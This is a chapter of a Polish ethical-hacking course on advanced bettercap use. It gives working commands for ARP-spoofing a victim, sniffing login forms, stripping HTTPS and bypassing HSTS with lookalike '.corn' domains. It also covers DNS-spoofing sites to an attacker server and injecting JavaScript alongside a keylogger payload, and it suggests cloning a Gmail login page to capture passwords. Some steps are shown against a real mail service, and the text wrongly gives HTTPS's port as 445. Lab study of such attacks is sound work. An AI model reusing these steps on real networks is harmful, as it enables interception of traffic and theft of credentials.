<- Poprzedni rodział -- Następny rozdział ->

Rozdział 15: Zaawansowane możliwości Bettercap

Podstawowe umiejętności z obsługi bettercapa nabyliśmy w poprzednim rozdziale. Jeżeli nie czytałeś to nim rozpoczniesz lekturę tego materiału wróć do poprzedniego ponieważ prezentowane tam sposoby nie będą już omawiane, a są podwaliną całego korzystania z bettercapa.

15.1. Main in the Middle co dalej…

Jeżeli analizowałeś poprzedni materiał to jesteś teraz Man in the Middle czyli na samym środku połączenia pomiędzy celem, a internetem. Oznacza to, że wszystkie pakiety zarówno te przychodzące jak i wychodzące przechodzą przez Ciebie, a dokładnie przez twoją kartę sieciową lub adapter bezprzewodowy.

Jak zapewne zauważyłeś na tym etapie zakończyliśmy. Powstaje jednak problem bo co z tego, że wszystko co wyżej wymienione przechodzi przez nas jak my nie jesteśmy w stanie nic z tym zrobić? Dlatego teraz zajmiemy się przetwarzaniem danych, czyli sprawdzimy co nasz cel przegląda w internecie. Aby tego dokonać musimy uruchomić moduł noszący nazwę:

net.sniff on

Po włączeniu otrzymywać będziemy informacje jakie strony użytkownik przegląda. Jest jedno ale, strony muszą korzystać z protokołu HTTP, a nie HTTPS.

15.2. Czym różni się HTTP od HTTPS

Protokół HTTP służy do przesyłania danych w formie strony internetowej pomiędzy serwerem, a komputerem użytkownika. Korzysta z portu 80 oraz z połączenia TCP co świadczy o jego niezawodności. Jest o tyle elastyczny, że jego zastosowanie mocno wybiega poza wymieniony zakres, ale o tym jeżeli chcesz poczytać proponuję poszukać informacji w internecie. Z tego materiału chciałbym, abyś wiedział, że dzięki wymienionemu protokołowi udaje się przeglądać strony internetowe.

Protokół HTTP został wymyślony do stron statycznych, czyli takich które na przykład nie posiadają możliwości logowania. Jak zapewne się domyślasz obecnie większość stron posiada funkcję logowania, a nawet jest ona niezbędna, jak na przykład w przypadku dostępu do naszego konta bankowego. Niestety samo w sobie HTTP nie przewidywało zabezpieczenia do przesyłania danych tak wrażliwych jak tutaj wymienione. Dlatego powstał protokół HTTPS, który jest odpowiednikiem HTTP, ale z dodatkową funkcją szyfrowania.

Protokół HTTPS przesyła dane pomiędzy serwerem, a użytkownikiem w sposób zaszyfrowany. Korzysta z portu 445 jak i również dba o to by przesyłane dane nie były w jakiś sposób modyfikowane. Brzmi dobrze, ale niestety tylko brzmi. W dalszej części rozdziału poznasz sposoby jak obejść ten protokół.

Aby prezentowany niżej sposób zadziałał strona mysi wykorzystywać protokół HTTP, a nie HTTPS.

15.3. Pozyskiwanie danych od użytkownika.

Wiemy już z jakiego typu stron musimy skorzystać, aby opisywany tutaj sposób zadziałał. Abyś nie musiał szukać polecam skorzystać ze strony http://vulnweb.com/. Została ona specjalne zaprojektowana do wykonywania różnego rodzaju testów penetracyjnych. Ze względu, że posiada możliwość logowania wykorzystamy ją do naszego celu. Dokładniej wejść musimy na http://testphp.vulnweb.com/login.php gdzie znajduje się pole do logowania. Adres wymienionej strony oczywiście wpisujemy w przeglądarce systemu na którym przeprowadzamy atak. Pamiętaj również, że aby wszystko zadziałało powinieneś mieć włączone wszystkie poznane wcześniej moduły:

net.probe on set arp.spoof.fullduplex true set arp.spoof.targets 10.0.2.4 arp.spoof on net.sniff on

Wszystkim wymienionym w powyższym przykładzie zajęliśmy się w poprzednim oraz tym rozdziale. Dlatego jeżeli nie rozumiesz jak działa któryś z wymienionych modułów polecam wrócić do wcześniejszych materiałów.

Mamy już właściwie skonfigurowany oraz uruchomiony bettercap. W przeglądarce systemu Windows 10 wpisujemy adres http://testphp.vulnweb.com/login.php. Następnie w Kali Linux, w programie bettercap powinieneś zobaczyć bardzo dużo informacji dotyczących z czym łączy się użytkownik. Nie wiem na jakim etapie pod względem „programowania” stron jesteś, ale jeżeli masz jakieś pojęcie i dokładnie wczytasz się to nie tylko otrzymujesz informacje, że użytkownik wszedł na wyżej wymienioną stronę. Ja przykładowo otrzymałem jeszcze:

10.0.2.0/24 > 10.0.2.15 » [06:35:14] [net.sniff.dns] dns gateway > MSEDGEWIN10.local : l-0007.l-msedge.net is 13.107.42.16 10.0.2.0/24 > 10.0.2.15 » [06:35:14] [net.sniff.dns] dns gateway > MSEDGEWIN10.local : l-0007.l-msedge.net is 13.107.42.16 10.0.2.0/24 > 10.0.2.15 » [06:35:14] [net.sniff.dns] dns gateway > MSEDGEWIN10.local : l-0007.l-msedge.net is 13.107.42.16 10.0.2.0/24 > 10.0.2.15 » [06:35:14] [net.sniff.dns] dns gateway > MSEDGEWIN10.local : l-0007.l-msedge.net is 13.107.42.16 10.0.2.0/24 > 10.0.2.15 » [06:35:14] [net.sniff.dns] dns gateway > MSEDGEWIN10.local : a-0003.a-msedge.net is 204.79.197.203 10.0.2.0/24 > 10.0.2.15 » [06:35:14] [net.sniff.dns] dns gateway > MSEDGEWIN10.local : a-0003.a-msedge.net is 204.79.197.203 10.0.2.0/24 > 10.0.2.15 » [06:35:14] [net.sniff.dns] dns gateway > MSEDGEWIN10.local : a-0003.a-msedge.net is 204.79.197.203 10.0.2.0/24 > 10.0.2.15 » [06:35:14] [net.sniff.dns] dns gateway > MSEDGEWIN10.local : a-0003.a-msedge.net is 204.79.197.203

Przyjrzyj się dokładnie na to co otrzymałeś bo jest tego znacznie więcej niż tu wkleiłem. Jest to dość ciekawe ile czynności musi wykonać przeglądarka zanim otrzymamy pożądany przez nas efekt. Co ważniejsze, można zauważyć gdzie dane użytkownika są dodatkowo wysyłane.

Przejdźmy teraz do naszej przeglądarki w systemie Windows. Po wejściu na stronę http://testphp.vulnweb.com/login.php w miejscu gdzie masz możliwość wpisania loginu i hasła wpisz jako login nois, a jako hasło noishacking. Oczywiście możesz wpisać inne dane, ale najlepiej jako, że to twój pierwszy raz wprowadzić takie na które zwrócisz uwagę.

Jeżeli wszystko zadziałało, powinieneś otrzymać taką informację w konsoli:

uname=nois&pass=noishacking

Wiadomo, że nie udało się zalogować, ale dane które wpisaliśmy lub też wpisałby użytkownik otrzymaliśmy.

Jeżeli wyświetlił Ci się wynik taki sam jak mój to gratuluje właśnie wykonałeś swój pierwszy udany atak. Chyba przyznasz, że to świetne uczucie?

Delikatnie odbiegając od tematu i powtarzając się. Pamiętaj! Nigdy nie stosuj tego na sieciach, urządzeniach do których nie masz uprawnień. Jest to nielegalne i wiąże się z konsekwencjami prawnymi!

15.4. Man in the Middle, błąd połączenia.

Kiedyś jak byłem na twoim miejscu i uczyłem się tej techniki napotkałem na problem wymieniony w tytule. Dość długo zastanawiałem się dlaczego czasami się udaje, a czasami nie. Otóż po analizie jeżeli urządzenie na którym przeprowadzasz atak uruchomi wygaszacz ekranu, a Ty w tym czasie będziesz chciał stać się MITM to otrzymasz informacje o braku możliwości połączenia. Tak samo jak w wypadku uśpienia, hibernacji systemu wygaszacz ekranu uniemożliwi Ci ten atak.

Inaczej jest w sytuacji kiedy przeprowadzisz udany atak, a urządzenie uruchomi wygaszacz ekranu. Wtedy nadal będziesz przechwytywał pakiety. Dlatego pamiętaj, jeżeli napotkasz na taki problem najprawdopodobniej musisz w wirtualnej maszynie Windowsa 10 poruszyć myszką lub wykonać jakiś ruch by wyłączyć wygaszacz ekranu.

W ramach nauki polecam wyłączyć go całkowicie.

Jednak prawie zawsze przy pierwszym włączeniu bettercapa nie udaje się uzyskać adresu mac naszego routera. Należy wtedy uruchomić net.probe on oraz net.spoof on i wyjść przy pomocy sekwencji klawiszy ctrl + z lub wpisując exit. Następnie włączyć ponownie bettercapa.

15.5. Sposób na HTTPS

W paragrafie 15.2. tego rozdziału wyjaśniłem różnicę pomiędzy HTTP, a HTTPS. Wiemy już, że HTTPS jest bezpiecznym oraz zalecanym sposobem komunikacji między nami a stronami internetowymi szczególnie w przypadku kiedy wprowadzamy jakieś dane. Najlepszym przykładem jest dostęp do naszego konta bankowego. W dzisiejszych czasach żaden poważny bank nie pozwoliłby sobie na brak opcji HTTPS.

We wcześniejszym paragrafie nie wspomniałem, że sposobów szyfrowania jest bardzo wiele dlatego odnalezienie złotego środka nie zawsze jest możliwe. Prezentowany sposób nie działa na strony z list HSTS. Czym jest lista HSTS opowiem później, na razie chciałbym, abyś wiedział, że jeżeli użytkownik będzie chciał zalogować się na swoje konto https://gmail.com to ten sposób nie zadziała ponieważ gmail znajduje się na liście HSTS. W prezentowanym przykładzie zajmiemy się innymi stronami na które możemy się zalogować i uda się uzyskać dane typu login i hasło.

Sposób jaki chcę wam pokazać polega na pozbyciu się protokołu HTTPS i przejście na HTTP. Nim jednak do tego dojdziemy musimy zmodyfikować jeden z modułów bettercapa ponieważ w najnowszej wersji nie działa. Moduł o którym wspominam nosi nazwę hstshijack. Archiwum z wersją działającą przygotowałem pod linkiem:

https://drive.google.com/file/d/1Q-41nED-RY0TnxIa_fMHIDiwAIjWyg2v/view

Po pobraniu, paczkę należy rozpakować i folder z plikami umieścić w /usr/share/bettercap/caplets/ gdzie na samym początku usuwamy już istniejący folder hstshijack, a dopiero po tym wklejamy nowy.

Jeżeli otrzymasz komunikat o braku uprawnień do usunięcia oraz wklejenia nowego folderu najłatwiejszym sposobem, jest kliknąć gdziekolwiek w folderze caplets prawym przyciskiem myszki i wybrać opcję open as a root. Otworzy się nowe okno z uprawnieniami użytkownika root gdzie wszystkie powyższe czynności będziesz w stanie wykonać.

Teraz pozostaje nic innego jak tylko uruchomić bettercapa:

sudo bettercap -iface eth0

Następnie w nim uruchamiamy kilka modułów jak poniżej:

net.probe on set arp.spoof.fullduplex true set arp.spoof.targets 10.0.2.4 arp.spoof on set net.sniff.local true net.sniff on

Większość poleceń poznaliśmy już wcześniej. Pamiętaj, że najlepiej aby moduły były uruchamiane w prezentowanej kolejności. W przypadku ustawień opcji można robić to w według uznania lecz kolejność uruchomienia samych modułów musi być taka jak w przykładzie.

Z całej powyższej listy jedyną nowością jest przedostatnia opcja tj. set net.sniff.local true. Dzięki jej ustawieniu po przejściu strony na protokół HTTP będziemy otrzymywać pakiety od naszego celu z loginem oraz hasłem. Wszystko oczywiście zależy od autoryzacji z jakiej korzysta dana strona. Nawet bez uruchomienia tej opcji w niektórych przypadkach uda się pozyskać wymienione dane, ale włączając ją otrzymujemy możliwość uzyskania informacji z większego zasobu stron.

Teraz oczywiście uruchom wszystkie wymienione opcje. Pamiętaj jednak, że pod adresem ip 10.0.2.4 znajduje się mój Windows 10. Ty możesz mieć inny, dlatego jeżeli tak jest w arp.spoof.targets wpisz właściwy.

Mamy już wszystko poustawianie teraz należy uruchomić moduł odpowiedzialny za wyłączenie szyfrowania HTTPS. Robimy to w poniższy sposób:

hstshijack/hstshijack

Przejdź do Windowsa 10, oczywiście jeżeli jego obrałeś sobie za cel, i wejdź na stronę przykładowo poczta.onet.pl. Zwróć uwagę, że w przeglądarce na pasku gdzie wpisujesz adres strony pojawia się komunikat not secure. Oznacza to, że połączanie nie jest zabezpieczone. Czyli tak jak w przypadku http://testphp.vulnweb.com/login.php który korzysta z http.

Sprawdźmy czy na pewno udało się nam. Wpiszmy jako login noishacking@onet.pl, a jako hasło noishacking, następnie wciśnijmy Zaloguj się. Oczywiście nie zaloguje nas, bo takie konto nie istnieje, ale teraz przejdźmy do Kali Linux i poszukajmy:

login=noishacking@onet.pl&password=noishacking&perm=1

Jeżeli znajdziesz podobną linijkę, którą bettercap wyróżnia to udało się. Właśnie pozbyłeś się HTTPS i uzyskałeś login i hasło do konta pocztowego.

Pozwolę sobie ponownie wspomnieć sposób nie zawsze działa. Są różne metody szyfrowania jak i również istnieje jeszcze HSTS którym zajmiemy się w jednym z następnych podrozdziałów.

15.6. Skrypt, czyli upraszamy do maksimum

Nie wiem jak Ty, ale to ciągłe wprowadzanie tych samych poleceń, aby osiągnąć cel bywa bardzo męczące. Pamiętam jak pierwszy raz zajmowałem się tym zagadnieniem i coś nie działało według opisów. Wprowadzałem co rusz te same polecenia, aż wreszcie odkryłem co było przyczyną moich niepowodzeń.

Sposób ten jest idealny, jeżeli uczymy się. Natomiast kiedy już umiemy dobrze jest ułatwić sobie pracę. Szczególnie w sytuacji kiedy będziemy musieli kilkukrotnie ponawiać jakieś czynności. W naszym wypadku powtarzamy cały czas polecenia:

net.probe on set arp.spoof.fullduplex true set arp.spoof.targets 10.0.2.4 arp.spoof on set net.sniff.local true net.sniff on

I na samym końcu dodajemy hstshijack/hstshijack.

Bettercap daje możliwość wykorzystania skryptu z poleceniami dzięki któremu pozbędziemy się monotonii, przyspieszymy swoje testy oraz co chyba najważniejsze ułatwimy sobie pracę. Aby utworzyć taki skrypt należy otworzyć edytor tekstowy. W konsoli korzystać możemy z nano, natomiast w interfejsie graficznym mamy zainstalowany Text Editor. Jeżeli masz problemy z odnalezieniem ów edytora wystarczy, że klikniesz menu z oprogramowaniem Kali, znajdujące się w lewym górnym rogu i w pole do wyszukiwania wpiszesz słowo Text. Powinien się wyświetlić program dlatego śmiało otwórz go. Następnie w nim umieść zbiór poleceń które wypisałem powyżej. Pamiętaj jednak aby nie uwzględnić polecenia hstshijack/hstshijack. Będzie ono jedyne jakie musisz wpisać ręcznie, choć niezupełnie tak, ale o tym opowiem zaraz. Plik należy zapisać nadając mu rozszerzenie .cap. Ja swój nazwałem sniff.cap.

Uruchamiamy konsolę i przechodzimy do folderu gdzie stworzyliśmy skrypt. Otwieramy bettercapa wpisując następujące polecenie:

sudo bettercap -iface eth0 -caplet sniff.cap

Jak się zapewne domyślasz po opcji -caplet wpisujemy nazwę naszego skryptu. Jeżeli nie chcesz przechodzić do folderu gdzie utworzyłeś skrypt możesz do niego po prostu podać ścieżkę bezwzględną.

Pozostaje uruchomić hstshijack/hstshijack i tutaj uwaga, wcale nie musisz wpisywać całej nazwy. Wystarczy, że wpiszesz pierwsze dwie litery tj. hs i wciśniesz tabulator (klawisz TAB), cała nazwa sama się uzupełni, a Tobie pozostanie wcisnąć tylko ENTER.

Hstshijack/hstshijack nie jest jedynym pluginem z jakiego możesz skorzystać. Jeżeli chcesz poznać więcej wystarczy, że wpiszesz w uruchomionym bettercapie polecenie:

caplets.show

Wywieli się pełna lista możliwych do wykorzystania pluginów. Jeżeli masz ochotę poczytaj o każdym z nich, może znajdziesz jeszcze inne zastosowanie bettercapa które Cię zainteresuje.

15.7. HSTS czym jest i jak je obejść

HSTS jest to lista którą posiada przeglądarka i dzięki której strony na niej umieszczone zawsze uruchomiane są przy pomocy protokołu HTTPS. Jeżeli korzystałeś z prezentowanego wyżej sposobu obejścia HTTPS i wszedłeś na stronę na przykład facebook.com to zauważyłeś, że niestety dany sposób nie działa.

Tak naprawdę my już mamy wszystko uruchomione tak aby móc obejść HSTS, ale nim powiem jak zobaczmy co możemy z tym zrobić. Uruchommy konsole i przejdźmy do katalogu gdzie ostatnio kopiowaliśmy hstshijack czyli:

cd /usr/share/bettercap/caplets/hstshijack/

Otwórzmy jeden z plików tak jak poniżej:

sudo nano -w hstshijack.cap

Zawartość powinna być zbliżona do poniższej:

set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log set hstshijack.ignore * set hstshijack.targets gmail.com,*.gmail.com,twitter.com,*.twitter.com,> set hstshijack.replacements gmail.corn,*.gmail.corn,twitter.corn,*.twitter.c> set hstshijack.obfuscate false set hstshijack.encode false set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloa> set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js set dns.spoof.domains gmail.corn,*.gmail.corn,twitter.corn,*.twitter.corn,face> http.proxy on dns.spoof on

Czyli wszystko wstępnie jest automatycznie skonfigurowane, tylko nie korzystaliśmy jeszcze z tego sposobu. Od razu wspomnę, że nie zadziała na gmail ze względu na ich specyficzny własny system szyfrowania, ale na przykład na facebooka już tak.

Jeżeli chcesz to możesz uzupełnić listę o nowe strony z listy HSTS. Aby tego dokonać należy w set hstshijack.targets wpisać nazwę celu czyli przykładowo gmail.com następnie po przecinku wpisać *.gmail.com, obsługiwać będziemy wszystkie subdomeny.

Kolejnym krokiem jest w set hstshijack.replacements wpisać nazwę gmail.corn,*.gmail.corn. Zwróćcie szczególną uwagę na końcówkę. Nie mamy com tylko corn. Ktoś kto wymyślił ten skrypt bardzo inteligentnie zastąpił nazwę com, corn. Wyglądają prawie identycznie i tylko bardzo szczegółowe oko to zauważy. Nazwa ta będzie wyświetlana zamiast nazwy głównej dlatego jest tak bardzo istotna.

Ostatnim elementem w jakim należy dodać linię gmail.corn,*.gmail.corn jest set dns.spoof.domains tam kopiujemy wszystko to samo co w hstshijack.replacements.

Możesz zadać sobie pytanie jeżeli uruchomiony mieliśmy cały czas ten skrypt to dlaczego z niego nie korzystaliśmy? Nie wszystko jest tak łatwe jakby się wydawało. Aby ów sposób zadziałał nasz cel musi wejść na stronę na przykład facebooka przy pomocy wyszukiwarki google. Czyli wpisuje frazę facebook w wyszukiwarkę i tam klika odnośnik odnoszący się do facebooka. Spróbuj a zobaczysz. Bynajmniej na dzień dzisiejszy działa.

15.8. Przekierowanie na nasz serwer

Teraz chciałbym wam pokazać sposób który bardzo często jest wykorzystywany do wydobywania różnego rodzaju danych. Polega on na przekierowaniu strony na nasz serwer. Jeżeli masz jakąkolwiek wiedzę na temat instalacji oraz korzystania z oprogramowania apache to pewnie wiesz, że mając uruchomiony apache2, po wpisaniu w przeglądarkę localhost otrzymujemy dostęp do naszego serwera. Natomiast jeżeli inne urządzenie w sieci chce mieć dostęp do serwera wystarczy, że wpisze nasz adres ip.

Ważne! W naszej sieci! Poza nią nie ma takiej możliwości, o ile nie skonfigurowaliśmy apache2 by był widzialny na zewnątrz.

W ramach praktycznych wyjaśnień. Mój Kali Linux na którym mam uruchomiony serwer apache2 ma przypisany adres ip 10.0.2.15. W Windowsie 10 uruchomionym przy pomocy Virtualboxa wpisuję w przeglądarkę adres ip systemu Kali Linux i otrzymać powinienem stronę umieszczoną na serwerze.

Nie jest to nic nadzwyczajnego ponieważ w taki sposób działają serwery. W naszym wypadku jeżeli przekierowalibyśmy na przykład stronę noishacking.pl na 10.0.2.15 to nie potrzeba mocno sprawnego oka by zauważyć, że coś jest nie tak. My musimy zrobić to przekierowanie w taki sposób, aby użytkownik wchodzący na stronę był przekierowany na nasz serwer, ale wyświetlana nazwa domeny pozostała bez zmian. Aby tego dokonać po pierwsze należy uruchomić serwer apache2. Robimy to w następujący sposób:

service apache2 start

Następnie uruchamiamy bettercapa w taki sam sposób jak dotychczas, możemy zrobić to również ze stworzonym wcześniej skryptem:

sudo bettercap -iface eth0 -caplet sniff.cap

Wszystko wyjaśniałem w tym rozdziale dlatego jeżeli nie rozumiesz jakiejś części polecenia zerknij jeszcze raz na wcześniejsze materiały.

Uwaga tym razem nie możemy uruchomić pluginu hstshijack!

Po sprawdzeniu czy wszystko właściwie działa ustawiamy:

set dns.spoof.all true

Dzięki tej opcji umożliwiamy spoofing na dwie strony. O tym już pisałem bardzo dużo w rozdziale 13 dlatego jeżeli nie wiesz na czym polega spoofing dwustronny zajrzyj tam.

Następnie przekierowujemy na nasz lokalny serwer:

dns.spoof.domains noishacking.pl,*.noishacking.pl

Przypomina to sposób ustawienia jak w przypadku obejścia HSTS.

Teraz pozostaje jedynie uruchomić nasze przekierowanie:

dns.spoof on

No i oczywiście przetestować czy wszystko działa tak jak chcemy dlatego na naszym Windowsie 10 wchodzimy na stronę noishacking.pl i powinniśmy zostać przekierowani na nasz serwer, ale z zachowaniem domeny.

Na dzień dzisiejszy sposób działa na wszystkie strony. Dlatego myślę, że widzisz jakie możliwości stwarza. Wystarczy, że stworzysz, skopiujesz stronę przykładowo gmaila z możliwością fałszywego zalogowania się, a otrzymasz hasło.

Lecz jak wszystko, sposób nie jest idealny i chciałbym rzec, że na szczęście. Zadziała on tylko na adres wpisany bezpośrednio w pasku adresowym przeglądarki. Czyli cel nie może skorzystać z wyszukiwarki tylko link musi wpisać bezpośrednio.

15.9. Wstrzykiwanie kodu JavaScript

Dzięki poznanej metodzie wstrzykiwania kodu JavaScript będziemy w stanie zmodyfikować teoretycznie wszystko co znajduje się na stronie, a dokładnej będziemy w stanie zmodyfikować tak stronę by cel widział to co chcemy by zobaczył. Jest to bardzo potężne narzędzie i choć prezentowane tu przykłady może nie odwzorują tego, to istnieje takie narzędzie jak beef które posiada bardzo rozbudowane funkcje. Dzięki niemu jesteśmy w stanie otrzymać dostęp do całego systemu. O samym beefie porozmawiamy w dalszej części kursu. W tym momencie chciałem tylko wspomnieć, że to „małe” czego się tutaj uczysz prowadzi do czegoś wielkiego.

Nim wstrzykniemy kod JavaScript musimy stworzyć taki. Dlatego uruchamiamy konsolę i w naszym katalogu głównym (/home/kali/) uruchamiamy edytor nano w następujący sposób:

nano -w jsscript.js

W treści pliku wpisujemy:

alert('noishacking');

Przy pomocy sekwencji klawiszy ctrl + o i enterowi zapisujemy.

Skrypt wyświetla okienko w przeglądarce o treści umieszczonej pomiędzy nawiasami.

Następnie pozostaje dodać skrypt do wcześniej poznanego hstshijack dlatego edytujemy go:

sudo nano -w /usr/share/bettercap/caplets/hstshijack/hstshijack.cap

Odnajdujemy w nim linię z set hstshijack.payloads i dodajemy do niej zawartość:

*:/home/kali/jsscript.js

Czyli cała linia powinna wyglądać w następujący sposób:

set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js, *:/home/kali/jsscript.js

Oczywiście wszystko musi być umieszczone w jednej linii na co niestety szerokość strony może nie pozwolić. Po wykonaniu powyższych czynności zapisujemy plik przy pomocy sekwencji klawiszy ctr+o i wciskamy enter w celu akceptacji.

Następnie uruchamiamy bettercapa:

sudo bettercap -iface eth0 -caplet sniff.cap

Po czym uruchamiamy hstshijack/hstshijack i wchodzimy na dowolną stronę. Powinno wyskoczyć okienko z komunikatem noishacking.

Podsumowanie

Jak sam widzisz bettercap jest potężnym narzędziem. Nie opisywałem wszystkich jego możliwości dlatego resztę pozostawiam Tobie. Przyznaję, że w prezentowany materiał włożyłem bardzo dużo pracy ze względu na wiele wprowadzonych zmian od ostatniego mojego korzystania z niego. Mam nadzieję, że wiesz już jak ważne jest czuwanie nad podłączonymi urządzeniami i orientujesz się jak wykryć gdy któreś z nich chce Cię podsłuchiwać. W następnym rozdziale zajmiemy się sposobami zabezpieczania przed tego typu zagrożeniem. Dlatego zapraszam do dalszej lektury.

<- Poprzedni rodział -- Następny rozdział ->

Strona stosuje pliki cookies w celu profilowania, oraz analizuje statystykę ruchu. Prosimy o zapoznanie się z naszą polityką prywatności i wyrażenie zgody na podejmowane działania. W przypadku braku zgody i pozostaniu na niej strona może nie działać właściwie.

Akceptuję warunki zawarte w Polityce Prywatności

Nie akceptuję warunków i chcę opuścić stronę